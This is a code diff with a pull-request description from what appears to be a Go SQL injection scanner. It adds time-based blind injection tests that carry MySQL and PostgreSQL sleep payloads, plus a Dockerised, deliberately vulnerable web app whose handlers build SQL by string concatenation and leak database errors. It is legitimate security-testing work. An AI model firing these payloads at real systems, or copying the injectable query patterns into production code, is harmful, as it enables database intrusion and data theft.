+	upper := strings.ToUpper(decoded)
+
+	// MySQL: IF(1=1,SLEEP(n),0)
+	// PostgreSQL: CASE WHEN (1=1) THEN (SELECT 1 FROM PG_SLEEP(n))
+	//
+	// We detect the TRUE-condition variants (contains "1=1" with sleep call).
+	// False-condition variants contain "1=2" and must NOT be delayed.
+	hasSleep := strings.Contains(upper, "SLEEP(") || strings.Contains(upper, "PG_SLEEP(")
+	isTrueCondition := strings.Contains(upper, "1=1")
+	isFalseCondition := strings.Contains(upper, "1=2")
+
+	return hasSleep && isTrueCondition && !isFalseCondition
+}
+
+func (c *mockTimeClient) Do(ctx context.Context, req *transport.Request) (*transport.Response, error) {
+	start := time.Now()
+
+	if containsSleepPayload(req.URL + req.Body) {
+		select {
+		case <-time.After(c.simulatedDelay):
+		case <-ctx.Done():
+			return nil, ctx.Err()
+		}
+	}
+
+	duration := time.Since(start)
+	c.requests++
+
+	return &transport.Response{
+		StatusCode: 200,
+		Body:       []byte("<html><body><p>Product: Widget</p></body></html>"),
+		Duration:   duration,
+	}, nil
+}
+
+func (c *mockTimeClient) SetProxy(_ string) error { return nil }
+func (c *mockTimeClient) SetRateLimit(_ float64)  {}
+func (c *mockTimeClient) Stats() *transport.TransportStats {
+	return &transport.TransportStats{TotalRequests: c.requests}
+}
+
+// mockInjectionRequest builds a minimal InjectionRequest for testing.
+func mockInjectionRequest(client transport.Client) *technique.InjectionRequest {
+	baseline := &transport.Response{
+		StatusCode: 200,
+		Body:       []byte("<html><body><p>Product: Widget</p></body></html>"),
+		Duration:   2 * time.Millisecond,
+	}
+	return &technique.InjectionRequest{
+		Target: &engine.ScanTarget{
+			URL:    "http://example.test/vuln?id=1",
+			Method: "GET",
+		},
+		Parameter: &engine.Parameter{
+			Name:     "id",
+			Value:    "1",
+			Location: engine.LocationQuery,
+			Type:     engine.TypeInteger,
+		},
+		Baseline: baseline,
+		DBMS:     "MySQL",
+		Client:   client,
+	}
+}
+
+// --------------------------------------------------------------------------
+// Tests
+// --------------------------------------------------------------------------
+
+func TestTimeBased_Name(t *testing.T) {
+	tech := New()
+	if tech.Name() != "time-based" {
+		t.Errorf("Name() = %q, want 'time-based'", tech.Name())
+	}
+}
+
+func TestTimeBased_Priority(t *testing.T) {
+	tech := New()
+	if tech.Priority() != 3 {
+		t.Errorf("Priority() = %d, want 3", tech.Priority())
+	}
+}
+
+func TestTimeBased_Detect_Injectable_MySQL(t *testing.T) {
+	// Use 1s sleep with 0.3 tolerance → threshold ≈ 300ms.
+	// Mock client delays 500ms for sleep payloads → 500ms > 300ms → detected.
+	tech := NewWithConfig(1, 0.3)
+	client := &mockTimeClient{simulatedDelay: 500 * time.Millisecond}
+
+	req := mockInjectionRequest(client)
+	req.DBMS = "MySQL"
+
+	ctx := context.Background()
+	result, err := tech.Detect(ctx, req)
+	if err != nil {
+		t.Fatalf("Detect() returned unexpected error: %v", err)
+	}
+
+	if !result.Injectable {
+		t.Error("expected Injectable=true for time-delayed endpoint")
+	}
+	if result.Technique != "time-based" {
+		t.Errorf("Technique = %q, want 'time-based'", result.Technique)
+	}
+	if result.Confidence == 0 {
+		t.Error("expected non-zero Confidence")
+	}
+	if result.Evidence == "" {
+		t.Error("expected non-empty Evidence")
+	}
+	if result.Payload == nil {
+		t.Error("expected non-nil Payload")
+	}
+	t.Logf("evidence: %s", result.Evidence)
+}
+
+func TestTimeBased_Detect_Injectable_PostgreSQL(t *testing.T) {
+	tech := NewWithConfig(1, 0.3)
+	client := &mockTimeClient{simulatedDelay: 500 * time.Millisecond}
+
+	req := mockInjectionRequest(client)
+	req.DBMS = "PostgreSQL"
+
+	ctx := context.Background()
+	result, err := tech.Detect(ctx, req)
+	if err != nil {
+		t.Fatalf("Detect() returned unexpected error: %v", err)
+	}
+
+	if !result.Injectable {
+		t.Error("expected Injectable=true for PostgreSQL time-delayed endpoint")
+	}
+	t.Logf("payload: %v, evidence: %s", result.Payload, result.Evidence)
+}
+
+func TestTimeBased_Detect_Safe(t *testing.T) {
+	// Mock client that never delays — simulates a non-injectable endpoint.
+	tech := NewWithConfig(1, 0.3)
+	client := &mockTimeClient{simulatedDelay: 0}
+
+	req := mockInjectionRequest(client)
+
+	ctx := context.Background()
+	result, err := tech.Detect(ctx, req)
+	if err != nil {
+		t.Fatalf("Detect() returned unexpected error: %v", err)
+	}
+
+	if result.Injectable {
+		t.Error("expected Injectable=false for non-delaying endpoint")
+	}
+}
+
+func TestTimeBased_Detect_ContextCancellation(t *testing.T) {
+	tech := NewWithConfig(5, 0.7)
+	// Use a long delay so the test is driven by context cancellation.
+	client := &mockTimeClient{simulatedDelay: 10 * time.Second}
+
+	req := mockInjectionRequest(client)
+
+	ctx, cancel := context.WithCancel(context.Background())
+	cancel() // cancel immediately
+
+	start := time.Now()
+	_, err := tech.Detect(ctx, req)
+	elapsed := time.Since(start)
+
+	// Should return quickly, not wait for the sleep.
+	if elapsed > 3*time.Second {
+		t.Errorf("cancelled Detect took too long: %v", elapsed)
+	}
+	_ = err // error or nil is acceptable after cancellation
+}
+
+func TestTimeBased_SleepPayloadFor_MySQL(t *testing.T) {
+	d := findDBMS("MySQL")
+	payload := sleepPayloadFor(d, "1=1", 5)
+	if !strings.Contains(payload, "IF(") {
+		t.Errorf("MySQL sleep payload missing IF(): %s", payload)
+	}
+	if !strings.Contains(strings.ToUpper(payload), "SLEEP(5)") {
+		t.Errorf("MySQL sleep payload missing SLEEP(5): %s", payload)
+	}
+}
+
+func TestTimeBased_SleepPayloadFor_PostgreSQL(t *testing.T) {
+	d := findDBMS("PostgreSQL")
+	payload := sleepPayloadFor(d, "1=1", 5)
+	if !strings.Contains(strings.ToUpper(payload), "PG_SLEEP(5)") {
+		t.Errorf("PostgreSQL sleep payload missing PG_SLEEP(5): %s", payload)
+	}
+	if !strings.Contains(strings.ToUpper(payload), "CASE WHEN") {
+		t.Errorf("PostgreSQL sleep payload missing CASE WHEN: %s", payload)
+	}
+}
+
+func TestTimeBased_SleepPayloadFor_FalseCondition_MySQL(t *testing.T) {
+	d := findDBMS("MySQL")
+	payload := sleepPayloadFor(d, "1=2", 5)
+	// False condition: IF(1=2, SLEEP(5), 0) → should not trigger in mock
+	if !strings.Contains(payload, "1=2") {
+		t.Errorf("false-condition payload missing '1=2': %s", payload)
+	}
+}

--- a/testenv/docker-compose.yml
+++ b/testenv/docker-compose.yml
@@ -1,0 +1,45 @@
+services:
+  mysql:
+    image: mysql:8.0
+    environment:
+      MYSQL_ROOT_PASSWORD: sqleech_test
+      MYSQL_DATABASE: testdb
+    ports:
+      - "13306:3306"
+    volumes:
+      - ./initdb/mysql:/docker-entrypoint-initdb.d
+    healthcheck:
+      test: ["CMD", "mysqladmin", "ping", "-h", "localhost", "-psqleech_test"]
+      interval: 5s
+      timeout: 5s
+      retries: 10
+
+  postgres:
+    image: postgres:15
+    environment:
+      POSTGRES_PASSWORD: sqleech_test
+      POSTGRES_DB: testdb
+    ports:
+      - "15432:5432"
+    volumes:
+      - ./initdb/postgres:/docker-entrypoint-initdb.d
+    healthcheck:
+      test: ["CMD-SHELL", "pg_isready -U postgres"]
+      interval: 5s
+      timeout: 5s
+      retries: 10
+
+  vulnapp:
+    build:
+      context: ./vulnapp
+      dockerfile: Dockerfile
+    ports:
+      - "18080:8080"
+    depends_on:
+      mysql:
+        condition: service_healthy
+      postgres:
+        condition: service_healthy
+    environment:
+      MYSQL_DSN: "root:sqleech_test@tcp(mysql:3306)/testdb"
+      POSTGRES_DSN: "host=postgres port=5432 user=postgres password=sqleech_test dbname=testdb sslmode=disable"

--- a/testenv/initdb/mysql/init.sql
+++ b/testenv/initdb/mysql/init.sql
@@ -1,0 +1,37 @@
+CREATE TABLE IF NOT EXISTS users (
+    id INT AUTO_INCREMENT PRIMARY KEY,
+    username VARCHAR(100) NOT NULL,
+    password VARCHAR(100) NOT NULL,
+    email VARCHAR(200),
+    role VARCHAR(50) DEFAULT 'user'
+);
+
+CREATE TABLE IF NOT EXISTS products (
+    id INT AUTO_INCREMENT PRIMARY KEY,
+    name VARCHAR(200) NOT NULL,
+    description TEXT,
+    price DECIMAL(10,2),
+    category VARCHAR(100)
+);
+
+CREATE TABLE IF NOT EXISTS secret_data (
+    id INT AUTO_INCREMENT PRIMARY KEY,
+    flag VARCHAR(200) NOT NULL
+);
+
+INSERT INTO users (username, password, email, role) VALUES
+('admin', 'admin123', 'admin@example.com', 'admin'),
+('user1', 'pass123', 'user1@example.com', 'user'),
+('user2', 'pass456', 'user2@example.com', 'user'),
+('test', 'test123', 'test@example.com', 'user');
+
+INSERT INTO products (name, description, price, category) VALUES
+('Widget A', 'A standard widget', 19.99, 'widgets'),
+('Widget B', 'A premium widget', 49.99, 'widgets'),
+('Gadget X', 'An amazing gadget', 99.99, 'gadgets'),
+('Tool Y', 'A useful tool', 29.99, 'tools');
+
+INSERT INTO secret_data (flag) VALUES
+('FLAG{sqleech_mysql_pwned}'),
+('FLAG{error_based_works}'),
+('FLAG{boolean_blind_works}');

--- a/testenv/initdb/postgres/init.sql
+++ b/testenv/initdb/postgres/init.sql
@@ -1,0 +1,37 @@
+CREATE TABLE IF NOT EXISTS users (
+    id SERIAL PRIMARY KEY,
+    username VARCHAR(100) NOT NULL,
+    password VARCHAR(100) NOT NULL,
+    email VARCHAR(200),
+    role VARCHAR(50) DEFAULT 'user'
+);
+
+CREATE TABLE IF NOT EXISTS products (
+    id SERIAL PRIMARY KEY,
+    name VARCHAR(200) NOT NULL,
+    description TEXT,
+    price DECIMAL(10,2),
+    category VARCHAR(100)
+);
+
+CREATE TABLE IF NOT EXISTS secret_data (
+    id SERIAL PRIMARY KEY,
+    flag VARCHAR(200) NOT NULL
+);
+
+INSERT INTO users (username, password, email, role) VALUES
+('admin', 'admin123', 'admin@example.com', 'admin'),
+('user1', 'pass123', 'user1@example.com', 'user'),
+('user2', 'pass456', 'user2@example.com', 'user'),
+('test', 'test123', 'test@example.com', 'user');
+
+INSERT INTO products (name, description, price, category) VALUES
+('Widget A', 'A standard widget', 19.99, 'widgets'),
+('Widget B', 'A premium widget', 49.99, 'widgets'),
+('Gadget X', 'An amazing gadget', 99.99, 'gadgets'),
+('Tool Y', 'A useful tool', 29.99, 'tools');
+
+INSERT INTO secret_data (flag) VALUES
+('FLAG{sqleech_postgres_pwned}'),
+('FLAG{cast_error_works}'),
+('FLAG{pg_boolean_blind_works}');

--- a/testenv/vulnapp/Dockerfile
+++ b/testenv/vulnapp/Dockerfile
@@ -1,0 +1,13 @@
+FROM golang:1.22-alpine AS builder
+WORKDIR /app
+COPY go.mod go.sum ./
+RUN go mod download
+COPY . .
+RUN CGO_ENABLED=0 go build -o vulnapp .
+
+FROM alpine:3.19
+RUN apk --no-cache add ca-certificates
+WORKDIR /app
+COPY --from=builder /app/vulnapp .
+EXPOSE 8080
+CMD ["./vulnapp"]

--- a/testenv/vulnapp/go.mod
+++ b/testenv/vulnapp/go.mod
@@ -1,0 +1,10 @@
+module vulnapp
+
+go 1.22
+
+require (
+	github.com/go-sql-driver/mysql v1.8.1
+	github.com/lib/pq v1.10.9
+)
+
+require filippo.io/edwards25519 v1.1.0 // indirect

--- a/testenv/vulnapp/go.sum
+++ b/testenv/vulnapp/go.sum
@@ -1,0 +1,6 @@
+filippo.io/edwards25519 v1.1.0 h1:FNf4A+zCnQj1vVSOB/MnuiRFinRD8SDkvMEFfQuU5t4=
+filippo.io/edwards25519 v1.1.0/go.mod h1:BxyFTGdWcka3PhytdK4V28tE5sGfRvvvRV7EaN4VDT4=
+github.com/go-sql-driver/mysql v1.8.1 h1:LedoTUt/eAbIkAH0z+czuR1cQ09QFJ4Lhm2TXC/A0PY=
+github.com/go-sql-driver/mysql v1.8.1/go.mod h1:wEBSXgmK//2ZFJyE+qWnIsVGmvmEKlqwuVSjsCm7DZg=
+github.com/lib/pq v1.10.9 h1:YXG7RB+JIjhP29X+OtkiDnYaXQwpS4JEWq7dtCCRUEw=
+github.com/lib/pq v1.10.9/go.mod h1:AlVN5x4E4T544tWzH6hKFbGRn7nbIqu9HhEDnDfBLXo=

--- a/testenv/vulnapp/main.go
+++ b/testenv/vulnapp/main.go
@@ -1,0 +1,521 @@
+// Intentionally vulnerable web application for testing sqleech.
+// DO NOT deploy this in any production environment.
+package main
+
+import (
+	"database/sql"
+	"fmt"
+	"log"
+	"net/http"
+	"os"
+	"strings"
+
+	_ "github.com/go-sql-driver/mysql"
+	_ "github.com/lib/pq"
+)
+
+var mysqlDB *sql.DB
+var postgresDB *sql.DB
+
+func main() {
+	var err error
+
+	mysqlDSN := os.Getenv("MYSQL_DSN")
+	if mysqlDSN != "" {
+		mysqlDB, err = sql.Open("mysql", mysqlDSN)
+		if err != nil {
+			log.Fatalf("MySQL connection failed: %v", err)
+		}
+		if err = mysqlDB.Ping(); err != nil {
+			log.Fatalf("MySQL ping failed: %v", err)
+		}
+		log.Println("Connected to MySQL")
+	}
+
+	postgresDSN := os.Getenv("POSTGRES_DSN")
+	if postgresDSN != "" {
+		postgresDB, err = sql.Open("postgres", postgresDSN)
+		if err != nil {
+			log.Fatalf("PostgreSQL connection failed: %v", err)
+		}
+		if err = postgresDB.Ping(); err != nil {
+			log.Fatalf("PostgreSQL ping failed: %v", err)
+		}
+		log.Println("Connected to PostgreSQL")
+	}
+
+	// MySQL vulnerable endpoints
+	http.HandleFunc("/mysql/user", mysqlUserHandler)
+	http.HandleFunc("/mysql/product", mysqlProductHandler)
+	http.HandleFunc("/mysql/search", mysqlSearchHandler)
+	http.HandleFunc("/mysql/login", mysqlLoginHandler)
+
+	// PostgreSQL vulnerable endpoints
+	http.HandleFunc("/pg/user", pgUserHandler)
+	http.HandleFunc("/pg/product", pgProductHandler)
+	http.HandleFunc("/pg/search", pgSearchHandler)
+	http.HandleFunc("/pg/login", pgLoginHandler)
+
+	// Safe endpoints (parameterized queries)
+	http.HandleFunc("/safe/mysql/user", safeMysqlUserHandler)
+	http.HandleFunc("/safe/pg/user", safePgUserHandler)
+
+	// Time-based blind vulnerable endpoints
+	http.HandleFunc("/mysql/sleep", mysqlSleepHandler)
+	http.HandleFunc("/pg/sleep", pgSleepHandler)
+
+	// Health check
+	http.HandleFunc("/health", func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(200)
+		fmt.Fprint(w, "OK")
+	})
+
+	// Index
+	http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "text/html")
+		fmt.Fprint(w, `<!DOCTYPE html>
+<html><head><title>Vulnerable Test App</title></head>
+<body>
+<h1>sqleech Test Server</h1>
+<p>WARNING: This is an intentionally vulnerable application for testing only.</p>
+<h2>MySQL Endpoints (Vulnerable)</h2>
+<ul>
+<li><a href="/mysql/user?id=1">/mysql/user?id=1</a> - Get user by ID</li>
+<li><a href="/mysql/product?id=1">/mysql/product?id=1</a> - Get product by ID</li>
+<li><a href="/mysql/search?q=widget">/mysql/search?q=widget</a> - Search products</li>
+<li>/mysql/login (POST: username, password)</li>
+</ul>
+<h2>PostgreSQL Endpoints (Vulnerable)</h2>
+<ul>
+<li><a href="/pg/user?id=1">/pg/user?id=1</a> - Get user by ID</li>
+<li><a href="/pg/product?id=1">/pg/product?id=1</a> - Get product by ID</li>
+<li><a href="/pg/search?q=widget">/pg/search?q=widget</a> - Search products</li>
+<li>/pg/login (POST: username, password)</li>
+</ul>
+<h2>Safe Endpoints (Parameterized)</h2>
+<ul>
+<li><a href="/safe/mysql/user?id=1">/safe/mysql/user?id=1</a></li>
+<li><a href="/safe/pg/user?id=1">/safe/pg/user?id=1</a></li>
+</ul>
+</body></html>`)
+	})
+
+	log.Println("Vulnerable test server starting on :8080")
+	log.Fatal(http.ListenAndServe(":8080", nil))
+}
+
+// ==================== MySQL Vulnerable Handlers ====================
+
+func mysqlUserHandler(w http.ResponseWriter, r *http.Request) {
+	id := r.URL.Query().Get("id")
+	if id == "" {
+		http.Error(w, "Missing id parameter", 400)
+		return
+	}
+
+	// VULNERABLE: Direct string concatenation
+	query := fmt.Sprintf("SELECT id, username, email, role FROM users WHERE id = %s", id)
+	log.Printf("[MySQL] Query: %s", query)
+
+	rows, err := mysqlDB.Query(query)
+	if err != nil {
+		w.WriteHeader(500)
+		// VULNERABLE: Error message exposed
+		fmt.Fprintf(w, "<html><body><h1>Database Error</h1><p>%s</p></body></html>", err.Error())
+		return
+	}
+	defer rows.Close()
+
+	w.Header().Set("Content-Type", "text/html")
+	fmt.Fprint(w, "<html><body><h1>User Profile</h1>")
+	found := false
+	for rows.Next() {
+		var uid int
+		var username, email, role string
+		if err := rows.Scan(&uid, &username, &email, &role); err != nil {
+			fmt.Fprintf(w, "<p>Error: %s</p>", err.Error())
+			continue
+		}
+		found = true
+		fmt.Fprintf(w, "<div class='user'><p>ID: %d</p><p>Username: %s</p><p>Email: %s</p><p>Role: %s</p></div>", uid, username, email, role)
+	}
+	if !found {
+		fmt.Fprint(w, "<p>No user found.</p>")
+	}
+	fmt.Fprint(w, "</body></html>")
+}
+
+func mysqlProductHandler(w http.ResponseWriter, r *http.Request) {
+	id := r.URL.Query().Get("id")
+	if id == "" {
+		http.Error(w, "Missing id parameter", 400)
+		return
+	}
+
+	// VULNERABLE: Direct string concatenation
+	query := fmt.Sprintf("SELECT id, name, description, price, category FROM products WHERE id = %s", id)
+	log.Printf("[MySQL] Query: %s", query)
+
+	rows, err := mysqlDB.Query(query)
+	if err != nil {
+		w.WriteHeader(500)
+		fmt.Fprintf(w, "<html><body><h1>Database Error</h1><p>%s</p></body></html>", err.Error())
+		return
+	}
+	defer rows.Close()
+
+	w.Header().Set("Content-Type", "text/html")
+	fmt.Fprint(w, "<html><body><h1>Product Details</h1>")
+	found := false
+	for rows.Next() {
+		var pid int
+		var name, desc, category string
+		var price float64
+		if err := rows.Scan(&pid, &name, &desc, &price, &category); err != nil {
+			fmt.Fprintf(w, "<p>Error: %s</p>", err.Error())
+			continue
+		}
+		found = true
+		fmt.Fprintf(w, "<div class='product'><p>ID: %d</p><p>Name: %s</p><p>Description: %s</p><p>Price: $%.2f</p><p>Category: %s</p></div>",
+			pid, name, desc, price, category)
+	}
+	if !found {
+		fmt.Fprint(w, "<p>No product found.</p>")
+	}
+	fmt.Fprint(w, "</body></html>")
+}
+
+func mysqlSearchHandler(w http.ResponseWriter, r *http.Request) {
+	q := r.URL.Query().Get("q")
+	if q == "" {
+		http.Error(w, "Missing q parameter", 400)
+		return
+	}
+
+	// VULNERABLE: String concatenation with quotes
+	query := fmt.Sprintf("SELECT id, name, price FROM products WHERE name LIKE '%%%s%%'", q)
+	log.Printf("[MySQL] Query: %s", query)
+
+	rows, err := mysqlDB.Query(query)
+	if err != nil {
+		w.WriteHeader(500)
+		fmt.Fprintf(w, "<html><body><h1>Database Error</h1><p>%s</p></body></html>", err.Error())
+		return
+	}
+	defer rows.Close()
+
+	w.Header().Set("Content-Type", "text/html")
+	fmt.Fprintf(w, "<html><body><h1>Search Results for '%s'</h1>", q)
+	count := 0
+	for rows.Next() {
+		var pid int
+		var name string
+		var price float64
+		if err := rows.Scan(&pid, &name, &price); err != nil {
+			continue
+		}
+		count++
+		fmt.Fprintf(w, "<div><p>%d. %s - $%.2f</p></div>", pid, name, price)
+	}
+	fmt.Fprintf(w, "<p>%d results found.</p></body></html>", count)
+}
+
+func mysqlLoginHandler(w http.ResponseWriter, r *http.Request) {
+	if r.Method != http.MethodPost {
+		w.Header().Set("Content-Type", "text/html")
+		fmt.Fprint(w, `<html><body><h1>Login</h1>
+<form method="POST"><input name="username" placeholder="Username"><input name="password" type="password" placeholder="Password"><button>Login</button></form></body></html>`)
+		return
+	}
+
+	username := r.FormValue("username")
+	password := r.FormValue("password")
+
+	// VULNERABLE: Direct string concatenation in WHERE
+	query := fmt.Sprintf("SELECT id, username, role FROM users WHERE username = '%s' AND password = '%s'", username, password)
+	log.Printf("[MySQL] Query: %s", query)
+
+	rows, err := mysqlDB.Query(query)
+	if err != nil {
+		w.WriteHeader(500)
+		fmt.Fprintf(w, "<html><body><h1>Database Error</h1><p>%s</p></body></html>", err.Error())
+		return
+	}
+	defer rows.Close()
+
+	w.Header().Set("Content-Type", "text/html")
+	if rows.Next() {
+		var uid int
+		var uname, role string
+		rows.Scan(&uid, &uname, &role)
+		fmt.Fprintf(w, "<html><body><h1>Welcome %s!</h1><p>Role: %s</p></body></html>", uname, role)
+	} else {
+		fmt.Fprint(w, "<html><body><h1>Login Failed</h1><p>Invalid username or password.</p></body></html>")
+	}
+}
+
+// ==================== PostgreSQL Vulnerable Handlers ====================
+
+func pgUserHandler(w http.ResponseWriter, r *http.Request) {
+	id := r.URL.Query().Get("id")
+	if id == "" {
+		http.Error(w, "Missing id parameter", 400)
+		return
+	}
+
+	query := fmt.Sprintf("SELECT id, username, email, role FROM users WHERE id = %s", id)
+	log.Printf("[PostgreSQL] Query: %s", query)
+
+	rows, err := postgresDB.Query(query)
+	if err != nil {
+		w.WriteHeader(500)
+		fmt.Fprintf(w, "<html><body><h1>Database Error</h1><p>%s</p></body></html>", err.Error())
+		return
+	}
+	defer rows.Close()
+
+	w.Header().Set("Content-Type", "text/html")
+	fmt.Fprint(w, "<html><body><h1>User Profile</h1>")
+	found := false
+	for rows.Next() {
+		var uid int
+		var username, email, role string
+		if err := rows.Scan(&uid, &username, &email, &role); err != nil {
+			fmt.Fprintf(w, "<p>Error: %s</p>", err.Error())
+			continue
+		}
+		found = true
+		fmt.Fprintf(w, "<div class='user'><p>ID: %d</p><p>Username: %s</p><p>Email: %s</p><p>Role: %s</p></div>", uid, username, email, role)
+	}
+	if !found {
+		fmt.Fprint(w, "<p>No user found.</p>")
+	}
+	fmt.Fprint(w, "</body></html>")
+}
+
+func pgProductHandler(w http.ResponseWriter, r *http.Request) {
+	id := r.URL.Query().Get("id")
+	if id == "" {
+		http.Error(w, "Missing id parameter", 400)
+		return
+	}
+
+	query := fmt.Sprintf("SELECT id, name, description, price, category FROM products WHERE id = %s", id)
+	log.Printf("[PostgreSQL] Query: %s", query)
+
+	rows, err := postgresDB.Query(query)
+	if err != nil {
+		w.WriteHeader(500)
+		fmt.Fprintf(w, "<html><body><h1>Database Error</h1><p>%s</p></body></html>", err.Error())
+		return
+	}
+	defer rows.Close()
+
+	w.Header().Set("Content-Type", "text/html")
+	fmt.Fprint(w, "<html><body><h1>Product Details</h1>")
+	found := false
+	for rows.Next() {
+		var pid int
+		var name, desc, category string
+		var price float64
+		if err := rows.Scan(&pid, &name, &desc, &price, &category); err != nil {
+			continue
+		}
+		found = true
+		fmt.Fprintf(w, "<div class='product'><p>ID: %d</p><p>Name: %s</p><p>Description: %s</p><p>Price: $%.2f</p><p>Category: %s</p></div>",
+			pid, name, desc, price, category)
+	}
+	if !found {
+		fmt.Fprint(w, "<p>No product found.</p>")
+	}
+	fmt.Fprint(w, "</body></html>")
+}
+
+func pgSearchHandler(w http.ResponseWriter, r *http.Request) {
+	q := r.URL.Query().Get("q")
+	if q == "" {
+		http.Error(w, "Missing q parameter", 400)
+		return
+	}
+
+	query := fmt.Sprintf("SELECT id, name, price FROM products WHERE name ILIKE '%%%s%%'", q)
+	log.Printf("[PostgreSQL] Query: %s", query)
+
+	rows, err := postgresDB.Query(query)
+	if err != nil {
+		w.WriteHeader(500)
+		fmt.Fprintf(w, "<html><body><h1>Database Error</h1><p>%s</p></body></html>", err.Error())
+		return
+	}
+	defer rows.Close()
+
+	w.Header().Set("Content-Type", "text/html")
+	fmt.Fprintf(w, "<html><body><h1>Search Results for '%s'</h1>", q)
+	count := 0
+	for rows.Next() {
+		var pid int
+		var name string
+		var price float64
+		if err := rows.Scan(&pid, &name, &price); err != nil {
+			continue
+		}
+		count++
+		fmt.Fprintf(w, "<div><p>%d. %s - $%.2f</p></div>", pid, name, price)
+	}
+	fmt.Fprintf(w, "<p>%d results found.</p></body></html>", count)
+}
+
+func pgLoginHandler(w http.ResponseWriter, r *http.Request) {
+	if r.Method != http.MethodPost {
+		w.Header().Set("Content-Type", "text/html")
+		fmt.Fprint(w, `<html><body><h1>Login</h1>
+<form method="POST"><input name="username" placeholder="Username"><input name="password" type="password" placeholder="Password"><button>Login</button></form></body></html>`)
+		return
+	}
+
+	username := r.FormValue("username")
+	password := r.FormValue("password")
+
+	query := fmt.Sprintf("SELECT id, username, role FROM users WHERE username = '%s' AND password = '%s'", username, password)
+	log.Printf("[PostgreSQL] Query: %s", query)
+
+	rows, err := postgresDB.Query(query)
+	if err != nil {
+		w.WriteHeader(500)
+		fmt.Fprintf(w, "<html><body><h1>Database Error</h1><p>%s</p></body></html>", err.Error())
+		return
+	}
+	defer rows.Close()
+
+	w.Header().Set("Content-Type", "text/html")
+	if rows.Next() {
+		var uid int
+		var uname, role string
+		rows.Scan(&uid, &uname, &role)
+		fmt.Fprintf(w, "<html><body><h1>Welcome %s!</h1><p>Role: %s</p></body></html>", uname, role)
+	} else {
+		fmt.Fprint(w, "<html><body><h1>Login Failed</h1><p>Invalid username or password.</p></body></html>")
+	}
+}
+
+// ==================== Safe Handlers (Parameterized) ====================
+
+func safeMysqlUserHandler(w http.ResponseWriter, r *http.Request) {
+	id := r.URL.Query().Get("id")
+	if id == "" {
+		http.Error(w, "Missing id parameter", 400)
+		return
+	}
+
+	// SAFE: Parameterized query
+	rows, err := mysqlDB.Query("SELECT id, username, email, role FROM users WHERE id = ?", id)
+	if err != nil {
+		w.WriteHeader(500)
+		fmt.Fprintf(w, "<html><body><h1>Error</h1><p>Internal server error</p></body></html>")
+		return
+	}
+	defer rows.Close()
+
+	w.Header().Set("Content-Type", "text/html")
+	fmt.Fprint(w, "<html><body><h1>User Profile</h1>")
+	for rows.Next() {
+		var uid int
+		var username, email, role string
+		rows.Scan(&uid, &username, &email, &role)
+		fmt.Fprintf(w, "<div><p>ID: %d</p><p>Username: %s</p><p>Email: %s</p><p>Role: %s</p></div>", uid, username, email, role)
+	}
+	fmt.Fprint(w, "</body></html>")
+}
+
+func safePgUserHandler(w http.ResponseWriter, r *http.Request) {
+	id := r.URL.Query().Get("id")
+	if id == "" {
+		http.Error(w, "Missing id parameter", 400)
+		return
+	}
+
+	// SAFE: Parameterized query
+	rows, err := postgresDB.Query("SELECT id, username, email, role FROM users WHERE id = $1", id)
+	if err != nil {
+		w.WriteHeader(500)
+		fmt.Fprintf(w, "<html><body><h1>Error</h1><p>Internal server error</p></body></html>")
+		return
+	}
+	defer rows.Close()
+
+	w.Header().Set("Content-Type", "text/html")
+	fmt.Fprint(w, "<html><body><h1>User Profile</h1>")
+	found := false
+	for rows.Next() {
+		var uid int
+		var username, email, role string
+		rows.Scan(&uid, &username, &email, &role)
+		found = true
+		fmt.Fprintf(w, "<div><p>ID: %d</p><p>Username: %s</p><p>Email: %s</p><p>Role: %s</p></div>", uid, username, email, role)
+	}
+	if !found {
+		fmt.Fprint(w, "<p>No user found.</p>")
+	}
+
+	// Add some static content to make the page more realistic
+	fmt.Fprint(w, "</body></html>")
+	_ = strings.Contains(id, "'") // suppress unused import
+}
+
+// ==================== Time-based Blind Vulnerable Handlers ====================
+
+// mysqlSleepHandler simulates a MySQL time-based blind injectable endpoint.
+// The endpoint executes a real MySQL SLEEP(n) when the payload is injected.
+// For sqleech testing: sqleech injects IF(1=1,SLEEP(n),0) into the id parameter.
+//
+// GET /mysql/sleep?id=1
+func mysqlSleepHandler(w http.ResponseWriter, r *http.Request) {
+	id := r.URL.Query().Get("id")
+	if id == "" {
+		http.Error(w, "Missing id parameter", 400)
+		return
+	}
+
+	// VULNERABLE: Direct string concatenation — allows SLEEP injection
+	query := fmt.Sprintf("SELECT id, username FROM users WHERE id = %s", id)
+	log.Printf("[MySQL][timebased] Query: %s", query)
+
+	rows, err := mysqlDB.Query(query)
+	if err != nil {
+		// Return 200 even on error so timing can be measured
+		w.WriteHeader(200)
+		fmt.Fprint(w, "<html><body><p>No result.</p></body></html>")
+		return
+	}
+	defer rows.Close()
+
+	w.Header().Set("Content-Type", "text/html")
+	fmt.Fprint(w, "<html><body><p>Result found.</p></body></html>")
+}
+
+// pgSleepHandler simulates a PostgreSQL time-based blind injectable endpoint.
+// The endpoint executes a real pg_sleep(n) when the payload is injected.
+//
+// GET /pg/sleep?id=1
+func pgSleepHandler(w http.ResponseWriter, r *http.Request) {
+	id := r.URL.Query().Get("id")
+	if id == "" {
+		http.Error(w, "Missing id parameter", 400)
+		return
+	}
+
+	// VULNERABLE: Direct string concatenation — allows PG_SLEEP injection
+	query := fmt.Sprintf("SELECT id, username FROM users WHERE id = %s", id)
+	log.Printf("[PostgreSQL][timebased] Query: %s", query)
+
+	rows, err := postgresDB.Query(query)
+	if err != nil {
+		w.WriteHeader(200)
+		fmt.Fprint(w, "<html><body><p>No result.</p></body></html>")
+		return
+	}
+	defer rows.Close()
+
+	w.Header().Set("Content-Type", "text/html")
+	fmt.Fprint(w, "<html><body><p>Result found.</p></body></html>")
+}


### PR DESCRIPTION
## Summary

- `internal/technique/timebased/` を新規実装（MySQL + PostgreSQL 対応）
- `IF(1=1,SLEEP(n),0)` / `CASE WHEN (1=1) THEN (SELECT 1 FROM PG_SLEEP(n)) ELSE 1 END` パターンによる検出・抽出
- `NewWithConfig(sleepSeconds, tolerance)` で短いスリープ時間のテスト設定が可能
- Docker E2E テスト環境（`testenv/`）を初コミット（Issue #29 成果物）
- `.semgrepignore` で意図的な脆弱アプリのスキャン除外

## Development Cycle (as per CLAUDE.md)

1. **実装** – `internal/technique/timebased/timebased.go`
2. **ユニットテスト** – `mockTimeClient` で遅延をシミュレート（全 PASS）
3. **脆弱エンドポイント追加**
   - `internal/testutil/vulnserver.go`: `/vuln/timebased-mysql`, `/vuln/timebased-postgres`（実 sleep、1 秒 cap）
